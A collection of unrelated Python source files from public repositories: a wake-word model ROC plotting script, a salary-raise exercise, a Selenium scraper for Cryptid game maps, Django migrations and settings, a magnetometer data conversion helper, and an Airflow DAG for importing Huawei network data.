blob_id: 4a94d4e0f476fcbb73a0a653a656166d0438ab10 | directory_id: 2be678ddc49b9ce9c2f7bd198d12b6be94374ddd | content_id: 14cf83e4ec816dd3eabc2a3e18c0d72b66f281b2
path: /precise/scripts/graph.py
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: andreselizondo-adestech/mycroft-precise | snapshot_id: 2a7f08c7d74d39a1455ea1c15ded47fdedc89096 | revision_id: 0e0ac5b8b14ff6a6ecffd300c40049131990e8c9 | branch_name: refs/heads/dev
visit_date: 2021-05-21T01:21:30.066505 | revision_date: 2020-08-19T19:37:05 | committer_date: 2020-08-19T19:37:05
github_id: 252,484,092 | star_events_count: 3 | fork_events_count: 1
gha_license_id: Apache-2.0 | gha_event_created_at: 2020-08-19T19:32:00 | gha_created_at: 2020-04-02T14:49:40 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 5,814 | extension: py
content:
#!/usr/bin/env python3
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
import numpy as np
from functools import partial
from os.path import basename, splitext
from prettyparse import Usage
from typing import Callable, Tuple

from precise.network_runner import Listener
from precise.params import inject_params, pr
from precise.scripts.base_script import BaseScript
from precise.stats import Stats
from precise.threshold_decoder import ThresholdDecoder
from precise.train_data import TrainData


def get_thresholds(points=100, power=3) -> list:
    """Generate a series of thresholds between 0 and 1, weighted toward 0"""
    return [(i / (points + 1)) ** power for i in range(1, points + 1)]


class CachedDataLoader:
    """
    Class for reloading train data every time the params change

    Args:
        loader: Function that loads the train data (something that calls TrainData.load)
    """

    def __init__(self, loader: Callable):
        self.prev_cache = None
        self.data = None
        self.loader = loader

    def load_for(self, model: str) -> Tuple[list, list]:
        """Injects the model parameters, reloading if they changed, and returning the data"""
        inject_params(model)
        if self.prev_cache != pr.vectorization_md5_hash():
            self.prev_cache = pr.vectorization_md5_hash()
            self.data = self.loader()
        return self.data


def load_plt():
    try:
        import matplotlib.pyplot as plt
        return plt
    except ImportError:
        print('Please install matplotlib first')
        raise SystemExit(2)


def calc_stats(model_files, loader, use_train, filenames):
    model_data = {}
    for model in model_files:
        train, test = loader.load_for(model)
        inputs, targets = train if use_train else test
        print('Running network...')
        predictions = Listener.find_runner(model)(model).predict(inputs)
        print(inputs.shape, targets.shape)
        print('Generating statistics...')
        stats = Stats(predictions, targets, filenames)
        print('\n' + stats.counts_str() + '\n\n' + stats.summary_str() + '\n')
        model_name = basename(splitext(model)[0])
        model_data[model_name] = stats
    return model_data


class GraphScript(BaseScript):
    usage = Usage('''
        Show ROC curves for a series of models
        ...
        :-t --use-train
            Evaluate training data instead of test data
        :-nf --no-filenames
            Don't print out the names of files that failed
        :-r --resolution int 100
            Number of points to generate
        :-p --power float 3.0
            Power of point distribution
        :-l --labels
            Print labels attached to each point
        :-o --output-file str -
            File to write data instead of displaying it
        :-i --input-file str -
            File to read data from and visualize
        ...
    ''')
    usage.add_argument('models', nargs='*', help='Either Keras (.net) or TensorFlow (.pb) models to test')
    usage |= TrainData.usage

    def __init__(self, args):
        super().__init__(args)
        if not args.models and not args.input_file and args.folder:
            args.input_file = args.folder
        if bool(args.models) == bool(args.input_file):
            raise ValueError('Please specify either a list of models or an input file')
        if not args.output_file:
            load_plt()  # Error early if matplotlib not installed

    def run(self):
        args = self.args
        if args.models:
            data = TrainData.from_both(args.tags_file, args.tags_folder, args.folder)
            print('Data:', data)
            filenames = sum(data.train_files if args.use_train else data.test_files, [])
            loader = CachedDataLoader(partial(
                data.load, args.use_train, not args.use_train, shuffle=False
            ))
            model_data = calc_stats(args.models, loader, args.use_train, filenames)
        else:
            model_data = {
                name: Stats.from_np_dict(data) for name, data in np.load(args.input_file)['data'].item().items()
            }
            for name, stats in model_data.items():
                print('=== {} ===\n{}\n\n{}\n'.format(name, stats.counts_str(), stats.summary_str()))
        if args.output_file:
            np.savez(args.output_file, data={name: stats.to_np_dict() for name, stats in model_data.items()})
        else:
            plt = load_plt()
            decoder = ThresholdDecoder(pr.threshold_config, pr.threshold_center)
            thresholds = [decoder.encode(i) for i in np.linspace(0.0, 1.0, args.resolution)[1:-1]]
            for model_name, stats in model_data.items():
                x = [stats.false_positives(i) for i in thresholds]
                y = [stats.false_negatives(i) for i in thresholds]
                plt.plot(x, y, marker='x', linestyle='-', label=model_name)
                if args.labels:
                    for x, y, threshold in zip(x, y, thresholds):
                        plt.annotate('{:.4f}'.format(threshold), (x, y))
            plt.legend()
            plt.xlabel('False Positives')
            plt.ylabel('False Negatives')
            plt.show()


main = GraphScript.run_main

if __name__ == '__main__':
    main()
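For reference, get_thresholds front-loads its points near zero, where ROC curves need the most resolution (values below computed by hand):

ts = get_thresholds(points=5, power=3)
# [(i / 6) ** 3 for i in 1..5] ~= [0.0046, 0.0370, 0.1250, 0.2963, 0.5787]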
authors: ["matthew331199@gmail.com"] | author_id: matthew331199@gmail.com

blob_id: f6835052381793f2c861225e2220abd09398454e | directory_id: 61dd3524e904ee055a761815239da55db26f03eb | content_id: 42797fee163339669239668fce6cbf3207f3a018
path: /PYTHON-SALA DE AULA/Exercicios condicionais/exe-37.py
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: JaumVitor/HOMEWORK-PYTHON | snapshot_id: 149e4cb6d10421d1e980dd5b75a92f87355582f8 | revision_id: 7be3299f36af3a924fc5c6f4a63aeed0fd8fb38e | branch_name: refs/heads/master
visit_date: 2022-09-15T11:00:55.019562 | revision_date: 2022-08-26T18:46:06 | committer_date: 2022-08-26T18:46:06
github_id: 256,103,198 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,123 | extension: py
content:
# Salary adjustment brackets (per the printed menu):
#   up to R$280.00 inclusive: 20% raise; 280-700: 15%; 700-1500: 10%; above 1500: 5%
print('- salários até R$ 280,00 (incluindo) : aumento de 20%')
print('- salários entre R$ 280,00 e R$ 700,00 : aumento de 15%')
print('- salários entre R$ 700,00 e R$ 1500,00 : aumento de 10%')
print('- salários de R$ 1.500,00 em diante : aumento de 5%')
print('=' * 43)

sal = float(input('Qual valor do salario ? '))

if sal <= 280:
    nsal1 = sal * 1.20
    print('=' * 43)
    print('-Aumento de 20 %')
    print('-Salario antigo : R${:.2f}'.format(sal))
    print('-Novo salario é R${:.2f}'.format(nsal1))
elif (sal > 280) and (sal <= 700):
    nsal2 = sal * 1.15
    print('=' * 43)
    print('-Aumento de 15 %')
    print('-Salario antigo : R${:.2f}'.format(sal))
    print('-Novo salario é R${:.2f}'.format(nsal2))
elif (sal > 700) and (sal <= 1500):  # was `sal > 750`, which left 700-750 unhandled
    nsal3 = sal * 1.10
    print('=' * 43)
    print('-Aumento de 10 %')
    print('-Salario antigo : R${:.2f}'.format(sal))
    print('-Novo salario é R${:.2f}'.format(nsal3))
elif sal > 1500:
    nsal4 = sal * 1.05  # was 1.5, i.e. a 50% raise instead of the stated 5%
    print('=' * 43)
    print('-Aumento de 5%')
    print('-Salario antigo : R${:.2f}'.format(sal))
    print('-Novo salario é R${:.2f}'.format(nsal4))
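A hand-checked run (hypothetical input): for a salary of 1000.00 the third branch applies, so the script reports the old salary R$1000.00 and the new salary R$1100.00, a 10% raise.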
authors: ["joao.vitor.pires.060@gmail.com"] | author_id: joao.vitor.pires.060@gmail.com

blob_id: dde80391d1a289f17f39b3d1db3696e9b50a41ec | directory_id: 530797702626216b6aebc8fa5b55fc0cb494ad3e | content_id: 684018146052a3fe0e77e6788d3135746871f012
path: /cryptid/cryptid_maps_generator.py
detected_licenses: [] | license_type: no_license
repo_name: trung-hn/fun-stuffs | snapshot_id: fbe3951bad6a12a5c703892268f0422640aa2232 | revision_id: afadd2788e8eeff256e47a2c6a23ee6089bd2595 | branch_name: refs/heads/master
visit_date: 2023-08-31T20:55:28.662905 | revision_date: 2023-08-29T20:38:54 | committer_date: 2023-08-29T20:38:54
github_id: 203,461,969 | star_events_count: 0 | fork_events_count: 1
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,782 | extension: py
content:
#%%
import base64
import json
import time
from pathlib import Path

from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.by import By

DRIVER_PATH = r"D:\Workspace\sandbox\chromedriver.exe"  # raw string keeps backslashes literal
driver = webdriver.Chrome(executable_path=DRIVER_PATH)
driver.get("https://ospreypublishing.com/playcryptid/")


#%%
def download_map_to_path(driver, path):
    # Save Image
    canvas = driver.find_element(by=By.XPATH, value="//*[@id='mapCanvas']")
    # get the canvas as a PNG base64 string; substring(21) drops the
    # "data:image/png;base64," prefix (the stray comma that survives is
    # discarded by b64decode's default validate=False)
    canvas_base64 = driver.execute_script(
        "return arguments[0].toDataURL('image/png').substring(21);", canvas
    )
    # decode
    canvas_png = base64.b64decode(canvas_base64)
    Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
    with open(path, "wb") as f:
        f.write(canvas_png)


def save_clues_to_path(path, clues):
    Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
    with open(path, "w") as f:
        json.dump(clues, f)


def save_text_to_path(path, clue):
    Path(path.rsplit("/", 1)[0]).mkdir(parents=True, exist_ok=True)
    with open(path, "w") as f:
        f.write(clue)


def save_clues_for_each_player(driver, folder, player_no):
    clues = {}
    for player in range(1, player_no + 1):
        driver.find_element(by=By.XPATH, value="//*[@id='clueButton']").click()
        time.sleep(1)
        clue = driver.find_element(by=By.XPATH, value="//*[@id='clueText']")
        clues[f"Player {player}:"] = clue.text
        save_text_to_path(
            folder + f"player {player} clue.txt",
            clue.text,
        )
        driver.find_element(by=By.XPATH, value="//*[@id='clueButton']").click()
        time.sleep(0.6)
    save_clues_to_path(folder + "clues.json", clues)
    return clues


# %%
visited = set()
drop_down = Select(driver.find_element(by=By.XPATH, value="//*[@id='ngfPlayers']"))
for order in range(1, 101):
    for player_no in (2, 3, 4, 5):
        drop_down.select_by_value(str(player_no))
        time.sleep(0.5)

        # Start Game
        driver.find_element(by=By.XPATH, value="//*[@id='ngfStart']").click()
        time.sleep(0.1)
        try:
            driver.find_element(
                by=By.XPATH, value='//button[normalize-space()="OK"]'
            ).click()
        except:
            pass
        time.sleep(0.5)

        folder = f"data/Advance {player_no} players/Game {order}/"
        download_map_to_path(driver, folder + "map.png")

        # Save clues for each player
        clues = save_clues_for_each_player(driver, folder, player_no)
        jsonified_clues = json.dumps(clues)
        if jsonified_clues in visited:
            print(f"{order} already visited")
            continue
        visited.add(jsonified_clues)

        # Get hint
        time.sleep(1)
        driver.find_element(
            by=By.XPATH, value='//button[normalize-space()="Reveal Hint"]'
        ).click()
        time.sleep(0.1)
        driver.find_element(value="hint_confirm_yes").click()
        time.sleep(0.4)
        hint = driver.find_element(by=By.XPATH, value="//*[@id='hintText']")
        save_text_to_path(folder + "hint.txt", hint.text)

        # Get solution
        driver.find_element(value="targetButton").click()
        time.sleep(0.1)
        driver.find_element(value="target_confirm_yes").click()
        time.sleep(1)
        download_map_to_path(driver, folder + "solution/solution.png")

        # Quit
        driver.find_element(by=By.XPATH, value="//*[@id='quitButton']").click()
        time.sleep(0.4)
        try:
            driver.find_element(
                by=By.XPATH, value="//*[@id='quit_confirm_yes']"
            ).click()
        except:
            pass
        time.sleep(0.5)
# %%
authors: ["trung.nang.hoang@gmail.com"] | author_id: trung.nang.hoang@gmail.com

blob_id: 0f43d2c8b893f082d38427beb7a50cfa5047b97d | directory_id: f60eb7d15ce3ca06e2db1dc0af8b3b87bed08c37 | content_id: c701f4e2b1b402be2ac5c422cd43ebada3d8feb6
path: /home/migrations/0026_auto_20170613_1726.py
detected_licenses: [] | license_type: no_license
repo_name: wlminimal/epc | snapshot_id: 96136f0c5f2b4ddc04fbc7e7b76d6a41c631ea26 | revision_id: 2127a4e273a69a3ca0d5711fd1452c1bc5ab7590 | branch_name: refs/heads/master
visit_date: 2022-12-12T11:33:57.711869 | revision_date: 2019-04-12T16:33:58 | committer_date: 2019-04-12T16:33:58
github_id: 92,700,181 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2022-12-07T23:58:05 | gha_created_at: 2017-05-29T02:20:33 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 496 | extension: py
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2017-06-13 17:26
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('home', '0025_auto_20170613_1721'),
    ]

    operations = [
        migrations.AlterField(
            model_name='homepage',
            name='service_button_text',
            field=models.CharField(default='See more Service info', max_length=50),
        ),
    ]
authors: ["wlminimal@gmail.com"] | author_id: wlminimal@gmail.com

blob_id: d35824f9c7bc1d9b5bdf9ab1821580ea4c94cc6e | directory_id: 3d9640bf3fb1da00f2739424723fbf6d74b574c0 | content_id: 9bb3a316cc8f71e82a6646748c93e6a9df7fbec6
path: /project/accounts/migrations/0002_auto_20200809_1536.py
detected_licenses: [] | license_type: no_license
repo_name: brahim024/django-user-auth | snapshot_id: 265df0de18bdce4756c53c616ba097755175b519 | revision_id: 41339d449f6d2abb07ab30e087234915ada59186 | branch_name: refs/heads/master
visit_date: 2022-12-22T06:13:02.973405 | revision_date: 2020-09-26T00:08:58 | committer_date: 2020-09-26T00:08:58
github_id: 279,684,766 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 397 | extension: py
content:
# Generated by Django 3.1 on 2020-08-09 13:36

from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ('accounts', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='profile',
            name='phone',
            field=models.CharField(blank=True, max_length=20, null=True),
        ),
    ]
authors: ["ifninos168@gmail.com"] | author_id: ifninos168@gmail.com

blob_id: bba7005497f25a02a0b5b5133051bdc931a6245d | directory_id: 64327166debec734cdbdceed673affc7ef806901 | content_id: 267df1ccc5565082c44b00a4f948a140ec41ff5d
path: /backend/test_expo_app_23831/settings.py
detected_licenses: [] | license_type: no_license
repo_name: crowdbotics-apps/test-expo-app-23831 | snapshot_id: 85aa164045a6d6988b4507ecb316d72a1482db74 | revision_id: 67c0d3990ecc85359f9897676d58dad00bcdd3e7 | branch_name: refs/heads/master
visit_date: 2023-02-16T00:18:19.859203 | revision_date: 2021-01-14T00:33:41 | committer_date: 2021-01-14T00:33:41
github_id: 329,466,667 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 4,782 | extension: py
content:
"""
Django settings for test_expo_app_23831 project.
Generated by 'django-admin startproject' using Django 1.11.16.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import environ
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
env = environ.Env()
environ.Env.read_env(os.path.join(BASE_DIR, '.env'))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool('DEBUG', default=True)
ALLOWED_HOSTS = ['*']
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
]
ROOT_URLCONF = 'test_expo_app_23831.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates'), ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'test_expo_app_23831.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'test_expo_app_23831',
'USER': 'test_expo_app_23831',
'PASSWORD': 'test_expo_app_23831',
'HOST': 'localhost',
'PORT': '5432',
}
}
if env.str('DATABASE_URL', default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static')
]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
# allauth
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = None
LOGIN_REDIRECT_URL = '/'
if DEBUG:
# output email to console instead of sending
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = env.str('SENDGRID_USERNAME', '')
EMAIL_HOST_PASSWORD = env.str('SENDGRID_PASSWORD', '')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Import local settings
try:
from .local_settings import *
INSTALLED_APPS += DEBUG_APPS
except:
pass
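A hypothetical .env for local development, matching the env.str/env.bool lookups above (all values invented; django-environ's env.db() reads DATABASE_URL by default):

SECRET_KEY=change-me
DEBUG=True
DATABASE_URL=postgres://test_expo_app_23831:test_expo_app_23831@localhost:5432/test_expo_app_23831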
authors: ["team@crowdbotics.com"] | author_id: team@crowdbotics.com

blob_id: 431e0d44cfd2d2914eee2be9382d559ed9d7fc01 | directory_id: 4daff90cfce1f253a3d8b14583dc0a038d553ca5 | content_id: 0e4e30b2180fcae15b7a47f17ab897311e2a895b
path: /PyMess/MAG/SaveAllDip.py
detected_licenses: ["MIT"] | license_type: permissive
repo_name: mattkjames7/PyMess | snapshot_id: 42d0119a91d130649b3c601889ef132e38facb4f | revision_id: f2c68285a7845a24d98284e20ed4292ed5e58138 | branch_name: refs/heads/master
visit_date: 2021-06-28T14:43:32.748427 | revision_date: 2020-10-27T10:27:52 | committer_date: 2020-10-27T10:27:52
github_id: 174,409,228 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,171 | extension: py
content:
import numpy as np
from ._SaveDip import _SaveDip
from .DataAvailability import DataAvailability


def SaveAllDip(Minute=False, StartI=0, EndI=None):
    '''
    This procedure should save all magnetometer data rotated into
    a coordinate system useful for studying waves, with components in
    the poloidal, toroidal and parallel directions.

    Inputs:
        Minute: Set to True to use minute resolution data, or False for
            full time resolution data.
        StartI: Index of the first date to convert.
        EndI: Index after the last date to convert; None converts
            everything from StartI onwards.
    '''
    dates = DataAvailability(Minute, Type='MSO')
    nf = np.size(dates)
    if EndI is None:
        EndI = nf
    for i in range(StartI, EndI):
        print('Converting File {0} of {1} ({2})'.format(i + 1, nf, dates[i]))
        _SaveDip(dates[i], Minute)
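A short usage sketch (argument values invented; the import path assumes the package layout /PyMess/MAG/SaveAllDip.py):

from PyMess.MAG.SaveAllDip import SaveAllDip

# Convert minute-resolution files 50..99, e.g. to resume an interrupted run:
SaveAllDip(Minute=True, StartI=50, EndI=100)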
authors: ["mattkjames7@gmail.com"] | author_id: mattkjames7@gmail.com

blob_id: 6a244720c1ec569ef5ad9d6d031558d08080eddc | directory_id: 87f574548a321a668f325bc3d120a45366b0b76b | content_id: a7ae5a2639c51692d05636dbc2675c9b1f1421d8
path: /booking/migrations/0029_auto_20151020_1527.py
detected_licenses: [] | license_type: no_license
repo_name: judy2k/pipsevents | snapshot_id: 1d19fb4c07e4a94d285e6b633e6ae013da0d1efd | revision_id: 88b6ca7bb64b0bbbbc66d85d2fa9e975b1bd3081 | branch_name: refs/heads/master
visit_date: 2021-01-14T11:11:26.616532 | revision_date: 2016-10-07T20:47:39 | committer_date: 2016-10-07T20:55:13
github_id: 36,600,721 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2015-05-31T11:51:14 | gha_created_at: 2015-05-31T11:51:14 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 5,457 | extension: py
content:
# -*- coding: utf-8 -*-
from __future__ import unicode_literals

from django.db import models, migrations
import django.utils.timezone
import django_extensions.db.fields
from django.conf import settings


class Migration(migrations.Migration):

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('booking', '0028_event_cancelled'),
    ]

    operations = [
        migrations.CreateModel(
            name='Ticket',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                ('extra_ticket_info', models.TextField(default='', blank=True)),
                ('extra_ticket_info1', models.TextField(default='', blank=True)),
            ],
        ),
        migrations.CreateModel(
            name='TicketBooking',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                ('date_booked', models.DateTimeField(default=django.utils.timezone.now)),
                ('date_rebooked', models.DateTimeField(null=True, blank=True)),
                ('paid', models.BooleanField(default=False)),
                ('payment_confirmed', models.BooleanField(help_text='Payment confirmed by admin/organiser', default=False)),
                ('date_payment_confirmed', models.DateTimeField(null=True, blank=True)),
                ('cancelled', models.BooleanField(default=False)),
                ('reminder_sent', models.BooleanField(default=False)),
                ('warning_sent', models.BooleanField(default=False)),
                ('booking_reference', models.CharField(max_length=255)),
            ],
        ),
        migrations.CreateModel(
            name='TicketedEvent',
            fields=[
                ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),
                ('name', models.CharField(max_length=255)),
                ('description', models.TextField(default='', blank=True)),
                ('date', models.DateTimeField()),
                ('location', models.CharField(max_length=255, default='Watermelon Studio')),
                ('max_tickets', models.PositiveIntegerField(help_text='Leave blank if no max number', null=True, blank=True)),
                ('contact_person', models.CharField(max_length=255, default='Gwen Burns')),
                ('contact_email', models.EmailField(max_length=254, default='thewatermelonstudio@hotmail.com')),
                ('ticket_cost', models.DecimalField(default=0, decimal_places=2, max_digits=8)),
                ('advance_payment_required', models.BooleanField(default=True)),
                ('show_on_site', models.BooleanField(help_text='Tick to show on the site', default=True)),
                ('payment_open', models.BooleanField(default=True)),
                ('payment_info', models.TextField(blank=True)),
                ('payment_due_date', models.DateTimeField(help_text='Tickets that are not paid by the payment due date will be automatically cancelled (a warning email will be sent to users first).', null=True, blank=True)),
                ('payment_time_allowed', models.PositiveIntegerField(help_text='Number of hours allowed for payment after booking (after this ticket purchases will be cancelled. This will be ignored if there is a payment due date set on the event itself. ', null=True, blank=True)),
                ('email_studio_when_purchased', models.BooleanField(default=False)),
                ('max_ticket_purchase', models.PositiveIntegerField(help_text='Limit the number of tickets that can be purchased at one time', null=True, blank=True)),
                ('extra_ticket_info_label', models.CharField(max_length=255, default='', blank=True)),
                ('extra_ticket_info_help', models.CharField(help_text='Description/details/help text to display under the extra info field', max_length=255, default='', blank=True)),
                ('extra_ticket_info_required', models.BooleanField(help_text='Tick if this information is mandatory when booking tickets', default=False)),
                ('extra_ticket_info1_label', models.CharField(max_length=255, default='', blank=True)),
                ('extra_ticket_info1_help', models.CharField(help_text='Description/details/help text to display under the extra info field', max_length=255, default='', blank=True)),
                ('extra_ticket_info1_required', models.BooleanField(help_text='Tick if this information is mandatory when booking tickets', default=False)),
                ('slug', django_extensions.db.fields.AutoSlugField(max_length=40, unique=True, populate_from='name', blank=True, editable=False)),
            ],
            options={
                'ordering': ['-date'],
            },
        ),
        migrations.AddField(
            model_name='ticketbooking',
            name='ticketed_event',
            field=models.ForeignKey(related_name='ticket_bookings', to='booking.TicketedEvent'),
        ),
        migrations.AddField(
            model_name='ticketbooking',
            name='user',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='ticket',
            name='ticket_booking',
            field=models.ForeignKey(related_name='tickets', to='booking.TicketBooking'),
        ),
    ]
authors: ["rebkwok@gmail.com"] | author_id: rebkwok@gmail.com

blob_id: 3f0fffecb61d68c200b0497141ba08152cbf23ab | directory_id: 77b3ef4cae52a60181dfdf34ee594afc7a948925 | content_id: 65d0e712174d52e4a419c52213345d1decc65dd8
path: /mediation/dags/cm_sub_dag_import_huawei_2g_files.py
detected_licenses: ["Apache-2.0"] | license_type: permissive
repo_name: chandusekhar/bts-ce | snapshot_id: 4cb6d1734efbda3503cb5fe75f0680c03e4cda15 | revision_id: ad546dd06ca3c89d0c96ac8242302f4678ca3ee3 | branch_name: refs/heads/master
visit_date: 2021-07-15T02:44:27.646683 | revision_date: 2020-07-26T08:32:33 | committer_date: 2020-07-26T08:32:33
github_id: 183,961,877 | star_events_count: 0 | fork_events_count: 0
gha_license_id: Apache-2.0 | gha_event_created_at: 2020-07-26T08:32:34 | gha_created_at: 2019-04-28T21:42:29 | gha_language: Python
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 2,517 | extension: py
content:
import sys
import os

from airflow.models import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python_operator import BranchPythonOperator
from airflow.operators.dummy_operator import DummyOperator

# sys.path.append('/mediation/packages');
#
# from bts import NetworkBaseLine, Utils, ProcessCMData;
#
# bts_utils = Utils();


def import_huawei_2g_parsed_csv(parent_dag_name, child_dag_name, start_date, schedule_interval):
    """
    Import parsed Huawei 2G CM files.

    :param parent_dag_name:
    :param child_dag_name:
    :param start_date:
    :param schedule_interval:
    :return:
    """
    dag = DAG(
        '%s.%s' % (parent_dag_name, child_dag_name),
        schedule_interval=schedule_interval,
        start_date=start_date,
    )

    t23 = DummyOperator(task_id='branch_huawei_2g_importer', dag=dag)

    import_mml_csv = BashOperator(
        task_id='import_huawei_2g_mml_data',
        bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_mml_gsm /mediation/data/cm/huawei/parsed/mml_gsm ',
        dag=dag)

    import_nbi_csv = BashOperator(
        task_id='import_huawei_2g_nbi_data',
        bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_nbi_gsm /mediation/data/cm/huawei/parsed/nbi_gsm ',
        dag=dag)

    # This operator was also assigned to `import_nbi_csv`, shadowing the task
    # above; renamed for clarity (behaviour is unchanged, since dependencies
    # below are wired by task_id).
    import_gexport_csv = BashOperator(
        task_id='import_huawei_2g_gexport_data',
        bash_command='python /mediation/bin/load_cm_data_into_db.py huawei_gexport_gsm /mediation/data/cm/huawei/parsed/gexport_gsm ',
        dag=dag)

    t_join = DummyOperator(
        task_id='join_huawei_2g_importer',
        dag=dag,
    )

    t_run_huawei_gexport_gsm_insert_queries = BashOperator(
        task_id='run_huawei_gexport_gsm_insert_queries',
        bash_command='python /mediation/bin/run_cm_load_insert_queries.py huawei_gexport_gsm',
        dag=dag)

    dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_mml_data')
    dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_nbi_data')
    dag.set_dependency('branch_huawei_2g_importer', 'import_huawei_2g_gexport_data')

    dag.set_dependency('import_huawei_2g_gexport_data', 'run_huawei_gexport_gsm_insert_queries')

    dag.set_dependency('import_huawei_2g_mml_data', 'join_huawei_2g_importer')
